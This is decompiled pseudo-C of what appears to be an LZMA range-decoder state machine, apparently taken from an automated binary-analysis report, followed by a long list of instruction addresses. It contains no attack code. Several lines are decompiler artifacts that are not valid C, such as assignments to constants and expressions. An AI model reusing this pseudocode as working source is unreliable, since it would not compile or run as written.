							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                                                                        0x00406bc0
                                                                                                                        0x00406bc7
                                                                                                                        0x00406bcd
                                                                                                                        0x00406bd3
                                                                                                                        0x00000000
                                                                                                                        0x00406bd7
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406be3
                                                                                                                        0x00406bec
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406bf2
                                                                                                                        0x00000000
                                                                                                                        0x00406bf9
                                                                                                                        0x00406bfd
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c06
                                                                                                                        0x00406c09
                                                                                                                        0x00406c0c
                                                                                                                        0x00406c0e
                                                                                                                        0x00406c10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c16
                                                                                                                        0x00406c19
                                                                                                                        0x00406c1b
                                                                                                                        0x00406c1c
                                                                                                                        0x00406c1f
                                                                                                                        0x00406c21
                                                                                                                        0x00406c22
                                                                                                                        0x00406c24
                                                                                                                        0x00406c27
                                                                                                                        0x00406c2c
                                                                                                                        0x00406c31
                                                                                                                        0x00406c3a
                                                                                                                        0x00406c4d
                                                                                                                        0x00406c50
                                                                                                                        0x00406c59
                                                                                                                        0x00406c5c
                                                                                                                        0x00406c84
                                                                                                                        0x00406c84
                                                                                                                        0x00406c86
                                                                                                                        0x00406c94
                                                                                                                        0x00406c94
                                                                                                                        0x00406c98
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c88
                                                                                                                        0x00406c8b
                                                                                                                        0x00406c8b
                                                                                                                        0x00406c8c
                                                                                                                        0x00406c8c
                                                                                                                        0x00000000
                                                                                                                        0x00406c88
                                                                                                                        0x00406c5e
                                                                                                                        0x00406c62
                                                                                                                        0x00406c67
                                                                                                                        0x00406c67
                                                                                                                        0x00406c70
                                                                                                                        0x00406c76
                                                                                                                        0x00406c78
                                                                                                                        0x00406c7b
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c81
                                                                                                                        0x00000000
                                                                                                                        0x00406c9e
                                                                                                                        0x00406c9e
                                                                                                                        0x00406ca2
                                                                                                                        0x0040754e
                                                                                                                        0x00000000
                                                                                                                        0x0040754e
                                                                                                                        0x00406cab
                                                                                                                        0x00406cbb
                                                                                                                        0x00406cbe
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc1
                                                                                                                        0x00406cc4
                                                                                                                        0x00406cc4
                                                                                                                        0x00406cc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406cca
                                                                                                                        0x00406ccd
                                                                                                                        0x00406cd0
                                                                                                                        0x00406cfa
                                                                                                                        0x00406d00
                                                                                                                        0x00406d07
                                                                                                                        0x00000000
                                                                                                                        0x00406d07
                                                                                                                        0x00406cd2
                                                                                                                        0x00406cd6
                                                                                                                        0x00406cd9
                                                                                                                        0x00406cde
                                                                                                                        0x00406cde
                                                                                                                        0x00406ce9
                                                                                                                        0x00406cef
                                                                                                                        0x00406cf1
                                                                                                                        0x00406cf4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d39
                                                                                                                        0x00406d3f
                                                                                                                        0x00406d42
                                                                                                                        0x00406d4f
                                                                                                                        0x00406d57
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d0e
                                                                                                                        0x00406d12
                                                                                                                        0x0040755d
                                                                                                                        0x00000000
                                                                                                                        0x0040755d
                                                                                                                        0x00406d1e
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d29
                                                                                                                        0x00406d2c
                                                                                                                        0x00406d2f
                                                                                                                        0x00406d32
                                                                                                                        0x00406d35
                                                                                                                        0x00406d37
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073d4
                                                                                                                        0x004073da
                                                                                                                        0x004073dd
                                                                                                                        0x004073e0
                                                                                                                        0x004073fa
                                                                                                                        0x004073fd
                                                                                                                        0x00407403
                                                                                                                        0x0040740e
                                                                                                                        0x0040740e
                                                                                                                        0x00407410
                                                                                                                        0x004073e2
                                                                                                                        0x004073e2
                                                                                                                        0x004073f1
                                                                                                                        0x004073f5
                                                                                                                        0x004073f5
                                                                                                                        0x00407413
                                                                                                                        0x0040741a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040741c
                                                                                                                        0x0040741c
                                                                                                                        0x00407420
                                                                                                                        0x004075cf
                                                                                                                        0x00000000
                                                                                                                        0x004075cf
                                                                                                                        0x0040742c
                                                                                                                        0x00407433
                                                                                                                        0x0040743b
                                                                                                                        0x0040743b
                                                                                                                        0x0040743b
                                                                                                                        0x0040743e
                                                                                                                        0x00407441
                                                                                                                        0x00407441
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406d5f
                                                                                                                        0x00406d61
                                                                                                                        0x00406d64
                                                                                                                        0x00406dd5
                                                                                                                        0x00406dd8
                                                                                                                        0x00406ddb
                                                                                                                        0x00406de2
                                                                                                                        0x00406dec
                                                                                                                        0x00000000
                                                                                                                        0x00406dec
                                                                                                                        0x00406d66
                                                                                                                        0x00406d6a
                                                                                                                        0x00406d6d
                                                                                                                        0x00406d6f
                                                                                                                        0x00406d72
                                                                                                                        0x00406d75
                                                                                                                        0x00406d77
                                                                                                                        0x00406d7a
                                                                                                                        0x00406d7c
                                                                                                                        0x00406d81
                                                                                                                        0x00406d84
                                                                                                                        0x00406d87
                                                                                                                        0x00406d8b
                                                                                                                        0x00406d92
                                                                                                                        0x00406d95
                                                                                                                        0x00406d9c
                                                                                                                        0x00406da0
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da8
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406da2
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406d97
                                                                                                                        0x00406dac
                                                                                                                        0x00406daf
                                                                                                                        0x00406dcd
                                                                                                                        0x00406dcf
                                                                                                                        0x00000000
                                                                                                                        0x00406dcf
                                                                                                                        0x00406db1
                                                                                                                        0x00406db4
                                                                                                                        0x00406db7
                                                                                                                        0x00406dba
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbc
                                                                                                                        0x00406dbf
                                                                                                                        0x00406dc2
                                                                                                                        0x00406dc4
                                                                                                                        0x00406dc5
                                                                                                                        0x00406dc8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406ffe
                                                                                                                        0x00407002
                                                                                                                        0x00407020
                                                                                                                        0x00407023
                                                                                                                        0x0040702a
                                                                                                                        0x0040702d
                                                                                                                        0x00407030
                                                                                                                        0x00407033
                                                                                                                        0x00407036
                                                                                                                        0x00407039
                                                                                                                        0x0040703b
                                                                                                                        0x00407042
                                                                                                                        0x00407043
                                                                                                                        0x00407045
                                                                                                                        0x00407048
                                                                                                                        0x0040704b
                                                                                                                        0x0040704e
                                                                                                                        0x0040704e
                                                                                                                        0x00407053
                                                                                                                        0x00000000
                                                                                                                        0x00407053
                                                                                                                        0x00407004
                                                                                                                        0x00407007
                                                                                                                        0x0040700a
                                                                                                                        0x00407014
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00407068
                                                                                                                        0x0040706c
                                                                                                                        0x0040708f
                                                                                                                        0x00407092
                                                                                                                        0x00407095
                                                                                                                        0x0040709f
                                                                                                                        0x0040706e
                                                                                                                        0x0040706e
                                                                                                                        0x00407071
                                                                                                                        0x00407074
                                                                                                                        0x00407077
                                                                                                                        0x00407084
                                                                                                                        0x00407087
                                                                                                                        0x00407087
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070ab
                                                                                                                        0x004070af
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070b5
                                                                                                                        0x004070b9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004070bf
                                                                                                                        0x004070c1
                                                                                                                        0x004070c5
                                                                                                                        0x004070c5
                                                                                                                        0x004070c8
                                                                                                                        0x004070cc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040711c
                                                                                                                        0x00407120
